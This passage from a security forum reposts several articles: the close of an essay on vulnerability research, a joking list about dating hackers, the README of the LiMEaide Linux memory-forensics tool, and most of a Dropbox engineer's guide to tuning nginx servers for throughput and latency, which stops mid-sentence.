tasks that had converging outcomes. Here are some examples: Bob scouts for entry points and their parameters while Alice looks for vulnerable sinks. Alice fleshes out the payload to a vulnerable sink while Bob makes sense of the protocol to the sink's corresponding entry point. Bob reverses structs by analyzing client requests dynamically while Alice contributes by analyzing how they are received statically. Bob looks for accessible file shares on a network while Alice sifts through them for valuable information. Overall, working in teams can increase productivity but it takes some effort and foresight to make that a reality. It's also important to know when adding members won't be productive so as to avoid overhead. Final Notes Thanks for taking the time to read this if you made it this far. I hope this has taken some of the magic out of what's involved when finding vulnerabilities. It's normal to feel overwhelmed and a sense of impostor syndrome when researching (I don't think that ever goes away). This is a constant learning process that extends beyond a day job or what any single resource can teach you. I encourage you to try things on your own and learn how others approach this so you can aggregate, combine, and incorporate elements from each into your own approach. I'd like to thank @spookchop and other unnamed reviewers for their time and contributions. I am always open to more (critical) feedback so please contact me if you have any suggestions. The following tools were used for graphics: GIMP, WordItOut, draw.io, and FreeMind. @Jackson_T Sursa: http://jackson.thuraisamy.me/finding-vulnerabilities.html
      • 3
      • Like
      • Upvote
      • Thanks
  8. 17 tips you should know before dating a Hacker People don't ship with user manuals, same applies to the other type: `The Security Phreaks`. Whether you dated on purpose or by mistake the `security girl `or `security guy` (a.k.a. InfoSec, Information Security, IT Security or simply a Hacker), here are some instructions that might be helpful to tweak and maintain a sustainable, fruitful relationship full of joy, happiness and those shits. If you are into security stuff, the below will help you understand yourself more. Grey is a bad color, it's either they trust you or they don't. Perfect your 1st impression and the last one. Never interrupt them while coding, by this you will violate point #1 in terms of `bad last impression`. Those people are mentally ill Xor bad at their jobs. Don't lie. Those creatures have highly sensitive lie-dars and there to haunt you. In case you managed to keep a lie, they will praise your special powers and will love you forever. They might not answer your call, don't take it personal. Just call back the day after. If you miss your hacker due to some circumstances, get a web cam and play it cyber. Expect waking up after late night text messages. Answer immediately! Your availability is required upon need! Do not expect birthday gifts such as roses, cute hearts and diamond - Expect something useful. For Gods' sake, do not clean up their computer desks. Dust are part of the room's ecosystem. Being invited to technical events and security cons is not a date. Proving them wrong arouses them disregarding your gender. Through inherent nature they like to disassemble stuff and reassemble them. They might disassemble your heart, but RMV (Results might vary) among all extremes. Mostly applied to 1st dates, they might know more secrets about you; don't panic - background checks and social engineering are hackers' bestest hobby. They'll port-scan you for informational purposes. Don't show your vulnerabilities, they'll enjoy discovering them by themselves and will be glad helping you remediate them. A Backdoor might be a solution. Don't ask for their knowledge in Facebook and SMS hacking; if they do, strategically speaking, you'll be the last to inform. You might see them leading Viking wars while `speaking` security. Keep calm, relax, nothing is serious, show that you care. They will notice you understand no shit of their talks, but will appreciate all your interest attempts. Subscribe to 3G/4G : don't join their home networks. Don't trust any network they are connected to. Don't provide them with your home Wi-Fi password, they will not like at first it but will appreciate your security awareness level. On the bright side, they'll accept the challenge. Don't hand them your phone, even for the minimal duration and reasons - you will regret it someday somehow. In the end, your hacker conceives you as computer with a soul, we are all human after all; I hope you make use of my tips and enjoy your holes securely investigated ever after. Thank you for reading this post, please do not hesitate to update me with your feedback, comments and testimonials. Sursa: https://moophz.com/article/17-tips-you-should-know-dating-security-guy-or-girl
      • 3
      • Upvote
  9. LiMEaide v1.3.0 About LiMEaide is a python application designed to remotely dump RAM of a Linux client and create a volatility profile for later analysis on your local host. I hope that this will simplify Linux digital forensics in a remote environment. In order to use LiMEaide all you need to do is feed a remote Linux client IP address, sit back, and consume your favorite caffeinated beverage. How To TL;DR python3 limeaide.py <IP> and magic happens. For more detailed usage checkout the wiki For editing the configuration file see here Detailed usage limeaide.py [OPTIONS] REMOTE_IP -h, --help Shows the help dialog -u, --user : <user> Execute memory grab as sudo user. This is useful when root privileges are not granted. -p, --profile : <distro> <kernel version> <arch> Skip the profiler by providing the distribution, kernel version, and architecture of the remote client. -N, --no-profiler Do NOT run profiler and force the creation of a new module/profile for the client. -C, --dont-compress Do not compress memory file. By default memory is compressed on host. If you experience issues, toggle this flag. In my tests I see a ~60% reduction in file size --delay-pickup Execute a job to create a RAM dump on target system that you will retrieve later. The stored job is located in the scheduled_jobs/ dir that ends in .dat -P, --pickup <path to job file .dat> Pick up a job you previously ran with the --delayed-pickup switch. The file that follows this switch is located in the scheduled_jobs/ directory and ends in .dat -o, --output : <name> Change name of output file. Default is dump.bin -c, --case : <case num> Append case number to front of output directory. --force-clean If previous attempt failed then clean up client Set-up Dependencies python DEB base sudo apt-get install python3-paramiko python3-termcolor RPM base sudo yum install python3-paramiko python3-termcolor pip3 sudo pip3 install paramiko termcolor LiME In order to use LiME you must download and move the source into the LiMEaide/tools directory. Make sure the the LiME folder is named LiME. The full path should be as follows: NOTE: If you would like to build Volatility profiles, you must use my forked version of LiME. This provides debugging symbols used by dwarfdump. LiMEaide/tools/LiME/ How to... Download LiME v1.7.8 Extract into LiMEaide/tools/ Rename folder to LiME dwarfdump In order to build a volatility profile we need to be able to read the debugging symbols in the LKM. For this we need to install dwarfdump. If you encounter any issues finding/installing dwarfdump see the volatility page here DEB package manager sudo apt-get install dwarfdump RPM package manager sudo yum install libdwarf-tools Special Thanks and Notes The idea for this application was built upon the concept dreamed up by and the Linux Memory Grabber project And of course none of this could be possible without the amazing LiME project Limits at this time Support on for bash. Use other shells at your own risk Modules must be built on remote client. Therefore remote client must have proper headers installed. Sursa: https://github.com/kd8bny/LiMEaide
  10. Optimizing web servers for high throughput and low latency Alexey Ivanov Today 63 210 This is an expanded version of my talk at NginxConf 2017 on September 6, 2017. As an SRE on the Dropbox Traffic Team, I’m responsible for our Edge network: its reliability, performance, and efficiency. The Dropbox edge network is an nginx-based proxy tier designed to handle both latency-sensitive metadata transactions and high-throughput data transfers. In a system that is handling tens of gigabits per second while simultaneously processing tens of thousands latency-sensitive transactions, there are efficiency/performance optimizations throughout the proxy stack, from drivers and interrupts, through TCP/IP and kernel, to library, and application level tunings. Disclaimer In this post we’ll be discussing lots of ways to tune web servers and proxies. Please do not cargo-cult them. For the sake of the scientific method, apply them one-by-one, measure their effect, and decide whether they are indeed useful in your environment. This is not a Linux performance post, even though I will make lots of references to bcc tools, eBPF, and perf, this is by no means the comprehensive guide to using performance profiling tools. If you want to learn more about them you may want to read through Brendan Gregg’s blog. This is not a browser-performance post either. I’ll be touching client-side performance when I cover latency-related optimizations, but only briefly. If you want to know more, you should read High Performance Browser Networking by Ilya Grigorik. And, this is also not the TLS best practices compilation. Though I’ll be mentioning TLS libraries and their settings a bunch of times, you and your security team, should evaluate the performance and security implications of each of them. You can use Qualys SSL Test, to verify your endpoint against the current set of best practices, and if you want to know more about TLS in general, consider subscribing to Feisty Duck Bulletproof TLS Newsletter. Structure of the post We are going to discuss efficiency/performance optimizations of different layers of the system. Starting from the lowest levels like hardware and drivers: these tunings can be applied to pretty much any high-load server. Then we’ll move to linux kernel and its TCP/IP stack: these are the knobs you want to try on any of your TCP-heavy boxes. Finally we’ll discuss library and application-level tunings, which are mostly applicable to web servers in general and nginx specifically. For each potential area of optimization I’ll try to give some background on latency/throughput tradeoffs (if any), monitoring guidelines, and, finally, suggest tunings for different workloads. Hardware CPU For good asymmetric RSA/EC performance you are looking for processors with at least AVX2 (avx2 in /proc/cpuinfo) support and preferably for ones with large integer arithmetic capable hardware (bmi and adx). For the symmetric cases you should look for AES-NI for AES ciphers and AVX512 for ChaCha+Poly. Intel has a performance comparison of different hardware generations with OpenSSL 1.0.2, that illustrates effect of these hardware offloads. Latency sensitive use-cases, like routing, will benefit from fewer NUMA nodes and disabled HT. High-throughput tasks do better with more cores, and will benefit from Hyper-Threading (unless they are cache-bound), and generally won’t care about NUMA too much. Specifically, if you go the Intel path, you are looking for at least Haswell/Broadwell and ideally Skylake CPUs. If you are going with AMD, EPYC has quite impressive performance. NIC Here you are looking for at least 10G, preferably even 25G. If you want to push more than that through a single server over TLS, the tuning described here will not be sufficient, and you may need to push TLS framing down to the kernel level (e.g. FreeBSD, Linux). On the software side, you should look for open source drivers with active mailing lists and user communities. This will be very important if (but most likely, when) you’ll be debugging driver-related problems. Memory The rule of thumb here is that latency-sensitive tasks need faster memory, while throughput-sensitive tasks need more memory. Hard Drive It depends on your buffering/caching requirements, but if you are going to buffer or cache a lot you should go for flash-based storage. Some go as far as using a specialized flash-friendly filesystem (usually log-structured), but they do not always perform better than plain ext4/xfs. Anyway just be careful to not burn through your flash because you forgot to turn enable TRIM, or update the firmware. Operating systems: Low level Firmware You should keep your firmware up-to-date to avoid painful and lengthy troubleshooting sessions. Try to stay recent with CPU Microcode, Motherboard, NICs, and SSDs firmwares. That does not mean you should always run bleeding edge—the rule of thumb here is to run the second to the latest firmware, unless it has critical bugs fixed in the latest version, but not run too far behind. Drivers The update rules here are pretty much the same as for firmware. Try staying close to current. One caveat here is to try to decoupling kernel upgrades from driver updates if possible. For example you can pack your drivers with DKMS, or pre-compile drivers for all the kernel versions you use. That way when you update the kernel and something does not work as expected there is one less thing to troubleshoot. CPU Your best friend here is the kernel repo and tools that come with it. In Ubuntu/Debian you can install the linux-tools package, with handful of utils, but now we only use cpupower, turbostat, and x86_energy_perf_policy. To verify CPU-related optimizations you can stress-test your software with your favorite load-generating tool (for example, Yandex uses Yandex.Tank.) Here is a presentation from the last NginxConf from developers about nginx loadtesting best-practices: “NGINX Performance testing.” cpupower Using this tool is way easier than crawling /proc/. To see info about your processor and its frequency governor you should run: $ cpupower frequency-info ... driver: intel_pstate ... available cpufreq governors: performance powersave ... The governor "performance" may decide which speed to use ... boost state support: Supported: yes Active: yes Check that Turbo Boost is enabled, and for Intel CPUs make sure that you are running with intel_pstate, not the acpi-cpufreq, or even pcc-cpufreq. If you still using acpi-cpufreq, then you should upgrade the kernel, or if that’s not possible, make sure you are using performance governor. When running with intel_pstate, even powersave governor should perform well, but you need to verify it yourself. And speaking about idling, to see what is really happening with your CPU, you can use turbostat to directly look into processor’s MSRs and fetch Power, Frequency, and Idle State information: # turbostat --debug -P ... Avg_MHz Busy% ... CPU%c1 CPU%c3 CPU%c6 ... Pkg%pc2 Pkg%pc3 Pkg%pc6 ... Here you can see the actual CPU frequency (yes, /proc/cpuinfo is lying to you), and core/package idle states. If even with the intel_pstate driver the CPU spends more time in idle than you think it should, you can: Set governor to performance. Set x86_energy_perf_policy to performance. Or, only for very latency critical tasks you can: Use [/dev/cpu_dma_latency](https://access.redhat.com/articles/65410) interface. For UDP traffic, use busy-polling. You can learn more about processor power management in general and P-states specifically in the Intel OpenSource Technology Center presentation “Balancing Power and Performance in the Linux Kernel” from LinuxCon Europe 2015. CPU Affinity You can additionally reduce latency by applying CPU affinity on each thread/process, e.g. nginx has worker_cpu_affinity directive, that can automatically bind each web server process to its own core. This should eliminate CPU migrations, reduce cache misses and pagefaults, and slightly increase instructions per cycle. All of this is verifiable through perf stat. Sadly, enabling affinity can also negatively affect performance by increasing the amount of time a process spends waiting for a free CPU. This can be monitored by running runqlat on one of your nginx worker’s PIDs: usecs : count distribution 0 -> 1 : 819 | | 2 -> 3 : 58888 |****************************** | 4 -> 7 : 77984 |****************************************| 8 -> 15 : 10529 |***** | 16 -> 31 : 4853 |** | ... 4096 -> 8191 : 34 | | 8192 -> 16383 : 39 | | 16384 -> 32767 : 17 | | If you see multi-millisecond tail latencies there, then there is probably too much stuff going on on your servers besides nginx itself, and affinity will increase latency, instead of decreasing it. Memory All mm/ tunings are usually very workflow specific, there are only a handful of things to recommend: Set THP to madvise and enable them only when you are sure they are beneficial, otherwise you may get a order of magnitude slowdown while aiming for 20% latency improvement. Unless you are only utilizing only a single NUMA node you should set vm.zone_reclaim_mode to 0. ## NUMA Modern CPUs are actually multiple separate CPU dies connected by very fast interconnect and sharing various resources, starting from L1 cache on the HT cores, through L3 cache within the package, to Memory and PCIe links within sockets. This is basically what NUMA is: multiple execution and storage units with a fast interconnect. For the comprehensive overview of NUMA and its implications you can consult “NUMA Deep Dive Series” by Frank Denneman. But, long story short, you have a choice of: Ignoring it, by disabling it in BIOS or running your software under numactl --interleave=all, you can get mediocre, but somewhat consistent performance. Denying it, by using single node servers, just like Facebook does with OCP Yosemite platform. Embracing it, by optimizing CPU/memory placing in both user- and kernel-space. Let’s talk about the third option, since there is not much optimization needed for the first two. To utilize NUMA properly you need to treat each numa node as a separate server, for that you should first inspect the topology, which can be done with numactl --hardware: $ numactl --hardware available: 4 nodes (0-3) node 0 cpus: 0 1 2 3 16 17 18 19 node 0 size: 32149 MB node 1 cpus: 4 5 6 7 20 21 22 23 node 1 size: 32213 MB node 2 cpus: 8 9 10 11 24 25 26 27 node 2 size: 0 MB node 3 cpus: 12 13 14 15 28 29 30 31 node 3 size: 0 MB node distances: node 0 1 2 3 0: 10 16 16 16 1: 16 10 16 16 2: 16 16 10 16 3: 16 16 16 10 Things to look after: number of nodes. memory sizes for each node. number of CPUs for each node. distances between nodes. This is a particularly bad example since it has 4 nodes as well as nodes without memory attached. It is impossible to treat each node here as a separate server without sacrificing half of the cores on the system. We can verify that by using numastat: $ numastat -n -c Node 0 Node 1 Node 2 Node 3 Total -------- -------- ------ ------ -------- Numa_Hit 26833500 11885723 0 0 38719223 Numa_Miss 18672 8561876 0 0 8580548 Numa_Foreign 8561876 18672 0 0 8580548 Interleave_Hit 392066 553771 0 0 945836 Local_Node 8222745 11507968 0 0 19730712 Other_Node 18629427 8939632 0 0 27569060 You can also ask numastat to output per-node memory usage statistics in the /proc/meminfo format: $ numastat -m -c Node 0 Node 1 Node 2 Node 3 Total ------ ------ ------ ------ ----- MemTotal 32150 32214 0 0 64363 MemFree 462 5793 0 0 6255 MemUsed 31688 26421 0 0 58109 Active 16021 8588 0 0 24608 Inactive 13436 16121 0 0 29557 Active(anon) 1193 970 0 0 2163 Inactive(anon) 121 108 0 0 229 Active(file) 14828 7618 0 0 22446 Inactive(file) 13315 16013 0 0 29327 ... FilePages 28498 23957 0 0 52454 Mapped 131 130 0 0 261 AnonPages 962 757 0 0 1718 Shmem 355 323 0 0 678 KernelStack 10 5 0 0 16 Now lets look at the example of a simpler topology. $ numactl --hardware available: 2 nodes (0-1) node 0 cpus: 0 1 2 3 4 5 6 7 16 17 18 19 20 21 22 23 node 0 size: 46967 MB node 1 cpus: 8 9 10 11 12 13 14 15 24 25 26 27 28 29 30 31 node 1 size: 48355 MB Since the nodes are mostly symmetrical we can bind an instance of our application to each NUMA node with numactl --cpunodebind=X --membind=X and then expose it on a different port, that way you can get better throughput by utilizing both nodes and better latency by preserving memory locality. You can verify NUMA placement efficiency by latency of your memory operations, e.g. by using bcc’s funclatency to measure latency of the memory-heavy operation, e.g. memmove. On the kernel side, you can observe efficiency by using perf stat and looking for corresponding memory and scheduler events: # perf stat -e sched:sched_stick_numa,sched:sched_move_numa,sched:sched_swap_numa,migrate:mm_migrate_pages,minor-faults -p PID ... 1 sched:sched_stick_numa 3 sched:sched_move_numa 41 sched:sched_swap_numa 5,239 migrate:mm_migrate_pages 50,161 minor-faults The last bit of NUMA-related optimizations for network-heavy workloads comes from the fact that a network card is a PCIe device and each device is bound to its own NUMA-node, therefore some CPUs will have lower latency when talking to the network. We’ll discuss optimizations that can be applied there when we discuss NIC→CPU affinity, but for now lets switch gears to PCI-Express… PCIe Normally you do not need to go too deep into PCIe troubleshooting unless you have some kind of hardware malfunction. Therefore it’s usually worth spending minimal effort there by just creating “link width”, “link speed”, and possibly RxErr/BadTLP alerts for your PCIe devices. This should save you troubleshooting hours because of broken hardware or failed PCIe negotiation. You can use lspci for that: # lspci -s 0a:00.0 -vvv ... LnkCap: Port #0, Speed 8GT/s, Width x8, ASPM L1, Exit Latency L0s <2us, L1 <16us LnkSta: Speed 8GT/s, Width x8, TrErr- Train- SlotClk+ DLActive- BWMgmt- ABWMgmt- ... Capabilities: [100 v2] Advanced Error Reporting UESta: DLP- SDES- TLP- FCP- CmpltTO- CmpltAbrt- ... UEMsk: DLP- SDES- TLP- FCP- CmpltTO- CmpltAbrt- ... UESvrt: DLP+ SDES+ TLP- FCP+ CmpltTO- CmpltAbrt- ... CESta: RxErr- BadTLP- BadDLLP- Rollover- Timeout- NonFatalErr- CEMsk: RxErr- BadTLP- BadDLLP- Rollover- Timeout- NonFatalErr+ PCIe may become a bottleneck though if you have multiple high-speed devices competing for the bandwidth (e.g. when you combine fast network with fast storage), therefore you may need to physically shard your PCIe devices across CPUs to get maximum throughput. source: https://en.wikipedia.org/wiki/PCI_Express#History_and_revisions Also see the article, “Understanding PCIe Configuration for Maximum Performance,” on the Mellanox website, that goes a bit deeper into PCIe configuration, which may be helpful at higher speeds if you observe packet loss between the card and the OS. Intel suggests that sometimes PCIe power management (ASPM) may lead to higher latencies and therefore higher packet loss. You can disable it by adding pcie_aspm=off to the kernel cmdline. NIC Before we start, it worth mentioning that both Intel and Mellanox have their own performance tuning guides and regardless of the vendor you pick it’s beneficial to read both of them. Also drivers usually come with a README on their own and a set of useful utilities. Next place to check for the guidelines is your operating system’s manuals, e.g. Red Hat Enterprise Linux Network Performance Tuning Guide, which explains most of the optimizations mentioned below and even more. Cloudflare also has a good article about tuning that part of the network stack on their blog, though it is mostly aimed at low latency use-cases. When optimizing NICs ethtool will be your best friend. A small note here: if you are using a newer kernel (and you really should!) you should also bump some parts of your userland, e.g. for network operations you probably want newer versions of: ethtool, iproute2, and maybe iptables/nftables packages. Valuable insight into what is happening with you network card can be obtained via ethtool -S: $ ethtool -S eth0 | egrep 'miss|over|drop|lost|fifo' rx_dropped: 0 tx_dropped: 0 port.rx_dropped: 0 port.tx_dropped_link_down: 0 port.rx_oversize: 0 port.arq_overflows: 0 Consult with your NIC manufacturer for detailed stats description, e.g. Mellanox have a dedicated wiki page for them. From the kernel side of things you’ll be looking at /proc/interrupts, /proc/softirqs, and /proc/net/softnet_stat. There are two useful bcc tools here: hardirqs and softirqs. Your goal in optimizing the network is to tune the system until you have minimal CPU usage while having no packet loss. Interrupt Affinity Tunings here usually start with spreading interrupts across the processors. How specifically you should do that depends on your workload: For maximum throughput you can distribute interrupts across all NUMA-nodes in the system. To minimize latency you can limit interrupts to a single NUMA-node. To do that you may need to reduce the number of queues to fit into a single node (this usually implies cutting their number in half with ethtool -L). Vendors usually provide scripts to do that, e.g. Intel has set_irq_affinity. Ring buffer sizes Network cards need to exchange information with the kernel. This is usually done through a data structure called a “ring”, current/maximum size of that ring viewed via ethtool -g: $ ethtool -g eth0 Ring parameters for eth0: Pre-set maximums: RX: 4096 TX: 4096 Current hardware settings: RX: 4096 TX: 4096 You can adjust these values within pre-set maximums with -G. Generally bigger is better here (esp. if you are using interrupt coalescing), since it will give you more protection against bursts and in-kernel hiccups, therefore reducing amount of dropped packets due to no buffer space/missed interrupt. But there are couple of caveats: On older kernels, or drivers without BQL support, high values may attribute to a higher bufferbloat on the tx-side. Bigger buffers will also increase cache pressure, so if you are experiencing one, try lowing them. Coalescing Interrupt coalescing allows you to delay notifying the kernel about new events by aggregating multiple events in a single interrupt. Current setting can be viewed via ethtool -c: $ ethtool -c eth0 Coalesce parameters for eth0: ... rx-usecs: 50 tx-usecs: 50 You can either go with static limits, hard-limiting maximum number of interrupts per second per core, or depend on the hardware to automatically adjust the interrupt rate based on the throughput. Enabling coalescing (with -C) will increase latency and possibly introduce packet loss, so you may want to avoid it for latency sensitive. On the other hand, disabling it completely may lead to interrupt throttling and therefore limit your performance. Offloads Modern network cards are relatively smart and can offload a great deal of work to either hardware or emulate that offload in drivers themselves. All possible offloads can be obtained with ethtool -k: $ ethtool -k eth0 Features for eth0: ... tcp-segmentation-offload: on generic-segmentation-offload: on generic-receive-offload: on large-receive-offload: off [fixed] In the output all non-tunable offloads are marked with [fixed] suffix. There is a lot to say about all of them, but here are some rules of thumb: do not enable LRO, use GRO instead. be cautious about TSO, since it highly depends on the quality of your drivers/firmware. do not enable TSO/GSO on old kernels, since it may lead to excessive bufferbloat. **** Packet Steering All modern NICs are optimized for multi-core hardware, therefore they internally split packets into virtual queues, usually one-per CPU. When it is done in hardware it is called RSS, when the OS is responsible for loadbalancing packets across CPUs it is called RPS (with its TX-counterpart called XPS). When the OS also tries to be smart and route flows to the CPUs that are currently handling that socket, it is called RFS. When hardware does that it is called “Accelerated RFS” or aRFS for short. Here are couple of best practices from our production: If you are using newer 25G+ hardware it probably has enough queues and a huge indirection table to be able to just RSS across all your cores. Some older NICs have limitations of only utilizing the first 16 CPUs. You can try enabling RPS if: you have more CPUs than hardware queues and you want to sacrifice latency for throughput. you are using internal tunneling (e.g. GRE/IPinIP) that NIC can’t RSS; Do not enable RPS if your CPU is quite old and does not have x2APIC. Binding each CPU to its own TX queue through XPS is generally a good idea. Effectiveness of RFS is highly depended on your workload and whether you apply CPU affinity to it. **** Flow Director and ATR Enabled flow director (or fdir in Intel terminology) operates by default in an Application Targeting Routing mode which implements aRFS by sampling packets and steering flows to the core where they presumably are being handled. Its stats are also accessible through ethtool -S:$ ethtool -S eth0 | egrep ‘fdir’ port.fdir_flush_cnt: 0 … Though Intel claims that fdir increases performance in some cases, external research suggests that it can also introduce up to 1% of packet reordering, which can be quite damaging for TCP performance. Therefore try testing it for yourself and see if FD is useful for your workload, while keeping an eye for the TCPOFOQueue counter. Operating systems: Networking stack There are countless books, videos, and tutorials for the tuning the Linux networking stack. And sadly tons of “sysctl.conf cargo-culting” that comes with them. Even though recent kernel versions do not require as much tuning as they used to 10 years ago and most of the new TCP/IP features are enabled and well-tuned by default, people are still copy-pasting their old sysctls.conf that they’ve used to tune 2.6.18/2.6.32 kernels. To verify effectiveness of network-related optimizations you should: Collect system-wide TCP metrics via /proc/net/snmp and /proc/net/netstat. Aggregate per-connection metrics obtained either from ss -n --extended --info, or from calling getsockopt(``[TCP_INFO](http://linuxgazette.net/136/pfeiffer.html)``)/getsockopt(``[TCP_CC_INFO](https://patchwork.ozlabs.org/patch/465806/)``) inside your werbserver. tcptrace(1)’es of sampled TCP flows. Analyze RUM metrics from the app/browser. For sources of information about network optimizations, I usually enjoy conference talks by CDN-folks since they generally know what they are doing, e.g. Fastly on LinuxCon Australia. Listening what Linux kernel devs say about networking is quite enlightening too, for example netdevconf talks and NETCONF transcripts. It worth highlighting good deep-dives into Linux networking stack by PackageCloud, especially since they put an accent on monitoring instead of blindly tuning things: Monitoring and Tuning the Linux Networking Stack: Receiving Data Monitoring and Tuning the Linux Networking Stack: Sending Data Before we start, let me state it one more time: upgrade your kernel! There are tons of new network stack improvements, and I’m not even talking about IW10 (which is so 2010). I am talking about new hotness like: TSO autosizing, FQ, pacing, TLP, and RACK, but more on that later. As a bonus by upgrading to a new kernel you’ll get a bunch of scalability improvements, e.g.: removed routing cache, lockless listen sockets, SO_REUSEPORT, and many more. Overview From the recent Linux networking papers the one that stands out is “Making Linux TCP Fast.” It manages to consolidate multiple years of Linux kernel improvements on 4 pages by breaking down Linux sender-side TCP stack into functional pieces: Fair Queueing and Pacing Fair Queueing is responsible for improving fairness and reducing head of line blocking between TCP flows, which positively affects packet drop rates. Pacing schedules packets at rate set by congestion control equally spaced over time, which reduces packet loss even further, therefore increasing throughput. As a side note: Fair Queueing and Pacing are available in linux via fq qdisc. Some of you may know that these are a requirement for BBR (not anymore though), but both of them can be used with CUBIC, yielding up to 15-20% reduction in packet loss and therefore better throughput on loss-based CCs. Just don’t use it in older kernels (< 3.19), since you will end up pacing pure ACKs and cripple your uploads/RPCs. TSO autosizing and TSQ Both of these are responsible for limiting buffering inside the TCP stack and hence reducing latency, without sacrificing throughput. Congestion Control CC algorithms are a huge subject by itself, and there was a lot of activity around them in recent years. Some of that activity was codified as: tcp_cdg (CAIA), tcp_nv (Facebook), and tcp_bbr (Google). We won’t go too deep into discussing their inner-workings, let’s just say that all of them rely more on delay increases than packet drops for a congestion indication. BBR is arguably the most well-documented, tested, and practical out of all new congestion controls. The basic idea is to create a model of the network path based on packet delivery rate and then execute control loops to maximize bandwidth while minimizing rtt. This is exactly what we are looking for in our proxy stack. Preliminary data from BBR experiments on our Edge PoPs shows an increase of file download speeds: 6 hour TCP BBR experiment in Tokyo PoP: x-axis — time, y-axis — client download speed Here I want to stress out that we observe speed increase across all percentiles. That is not the case for backend changes. These usually only benefit p90+ users (the ones with the fastest internet connectivity), since we consider everyone else being bandwidth-limited already. Network-level tunings like changing congestion control or enabling FQ/pacing show that users are not being bandwidth-limited but, if I can say this, they are “TCP-limited.” If you want to know more about BBR, APNIC has a good entry-level overview of BBR (and its comparison to loss-based congestions controls). For more in-depth information on BBR you probably want to read through bbr-dev mailing list archives (it has a ton of useful links pinned at the top). For people interested in congestion control in general it may be fun to follow Internet Congestion Control Research Group activity. ACK Processing and Loss Detection But enough about congestion control, let’s talk about let’s talk about loss detection, here once again running the latest kernel will help quite a bit. New heuristics like TLP and RACK are constantly being added to TCP, while the old stuff like FACK and ER is being retired. Once added, they are enabled by default so you do not need to tune any system settings after the upgrade. Userspace prioritization and HOL Userspace socket APIs provide implicit buffering and no way to re-order chunks once they are sent, therefore in multiplexed scenarios (e.g. HTTP/2) this may result in a HOL blocking, and inversion of h2 priorities. [TCP_NOTSENT_LOWAT](https://lwn.net/Articles/560082/) socket option (and corresponding net.ipv4.tcp_notsent_lowat sysctl) were designed to solve this problem by setting a threshold at which the socket considers itself writable (i.e. epoll will lie to your app). This can solve problems with HTTP/2 prioritization, but it can also potentially negatively affect throughput, so you know the drill—test it yourself. Sysctls One does not simply give a networking optimization talk without mentioning sysctls that need to be tuned. But let me first start with the stuff you don’t want to touch: net.ipv4.tcp_tw_recycle=1—don’t use it—it was already broken for users behind NAT, but if you upgrade your kernel, it will be broken for everyone. net.ipv4.tcp_timestamps=0—don’t disable them unless you know all side-effects and you are OK with them. For example, one of non-obvious side effects is that you will loose window scaling and SACK options on syncookies. As for sysctls that you should be using: net.ipv4.tcp_slow_start_after_idle=0—the main problem with slowstart after idle is that “idle” is defined as one RTO, which is too small. net.ipv4.tcp_mtu_probing=1—useful if there are ICMP blackholes between you and your clients (most likely there are). net.ipv4.tcp_rmem, net.ipv4.tcp_wmem—should be tuned to fit BDP, just don’t forget that bigger isn’t always better. echo 2 > /sys/module/tcp_cubic/parameters/hystart_detect—if you are using fq+cubic, this might help with tcp_cubic exiting the slow-start too early. It also worth noting that there is an RFC draft (though a bit inactive) from the author of curl, Daniel Stenberg, named TCP Tuning for HTTP, that tries to aggregate all system tunings that may be beneficial to HTTP in a single place. Application level: Midlevel Tooling Just like with the kernel, having up-to-date userspace is very important. You should start with upgrading your tools, for example you can package newer versions of perf, bcc, etc. Once you have new tooling you are ready to properly tune and observe the behavior of a system. Through out this part of the post we’ll be mostly relying on on-cpu profiling with perf top, on-CPU flamegraphs, and adhoc histograms from bcc’s funclatency. Compiler Toolchain Having a modern compiler toolchain is essential if you want to compile hardware-optimized assembly, which is present in many libraries commonly used by web servers. Aside from the performance, newer compilers have new security features (e.g. [-fstack-protector-strong](https://docs.google.com/document/d/1xXBH6rRZue4f296vGt9YQcuLVQHeE516stHwt8M9xyU/edit) or [SafeStack](https://clang.llvm.org/docs/SafeStack.html)) that you want to be applied on the edge. The other use case for modern toolchains is when you want to run your test harnesses against binaries compiled with sanitizers (e.g. AddressSanitizer, and friends). System libraries It’s also worth upgrading system libraries, like glibc, since otherwise you may be missing out on recent optimizations in low-level functions from -lc, -lm, -lrt, etc. Test-it-yourself warning also applies here, since occasional regressions creep in. Zlib Normally web server would be responsible for compression. Depending on how much data is going though that proxy, you may occasionally see zlib’s symbols in perf top, e.g.: # perf top ... 8.88% nginx [.] longest_match 8.29% nginx [.] deflate_slow 1.90% nginx [.] compress_block There are ways of optimizing that on the lowest levels: both Intel and Cloudflare, as well as a standalone zlib-ng project, have their zlib forks which provide better performance by utilizing new instructions sets. Malloc We’ve been mostly CPU-oriented when discussing optimizations up until now, but let’s switch gears and discuss memory-related optimizations. If you use lots of Lua with FFI or heavy third party modules that do their own memory management, you may observe increased memory usage due to fragmentation. You can try solving that problem by switching to either jemalloc or tcmalloc. Using custom malloc also has the following benefits: Separating your nginx binary from the environment, so that glibc version upgrades and OS migration will affect it less. Better introspection, profiling and stats. ## PCRE If you use many complex regular expressions in your nginx configs or heavily rely on Lua, you may see pcre-related symbols in perf top. You can optimize that by compiling PCRE with JIT, and also enabling it in nginx via pcre_jit on;. You can check the result of optimization by either looking at flame graphs, or using funclatency: # funclatency /srv/nginx-bazel/sbin/nginx:ngx_http_regex_exec -u ... usecs : count distribution 0 -> 1 : 1159 |********** | 2 -> 3 : 4468 |****************************************| 4 -> 7 : 622 |***** | 8 -> 15 : 610 |***** | 16 -> 31 : 209 |* | 32 -> 63 : 91 | | TLS If you are terminating TLS on the edge w/o being fronted by a CDN, then TLS performance optimizations may be highly valuable. When discussing tunings we’ll be mostly focusing server-side efficiency. So, nowadays first thing you need to decide is which TLS library to use: Vanilla OpenSSL, OpenBSD’s LibreSSL, or Google’s BoringSSL. After picking the TLS library flavor, you need to properly build it: OpenSSL for example has a bunch of built-time heuristics that enable optimizations based on build environment; BoringSSL has deterministic builds, but sadly is way more conservative and just disables some optimizations by default. Anyway, here is where choosing a modern CPU should finally pay off: most TLS libraries can utilize everything from AES-NI and SSE to ADX and AVX512. You can use built-in performance tests that come with your TLS library, e.g. in BoringSSL case it’s the bssl speed. Most of performance comes not from the hardware you have, but from cipher-suites you are going to use, so you have to optimize them carefully. Also know that changes here can (and will!) affect security of your web server—the fastest ciphersuites are not necessarily the best. If unsure what encryption settings to use, Mozilla SSL Configuration Generator is a good place to start. Asymmetric Encryption If your service is on the edge, then you may observe a considerable amount of TLS handshakes and therefore have a good chunk of your CPU consumed by the asymmetric crypto, making it an obvious target for optimizations. To optimize server-side CPU usage you can switch to ECDSA certs, which are generally 10x faster than RSA. Also they are considerably smaller, so it may speedup handshake in presence of packet-loss. But ECDSA is also heavily dependent on the quality of your system’s random number generator, so if you are using OpenSSL, be sure to have enough entropy (with 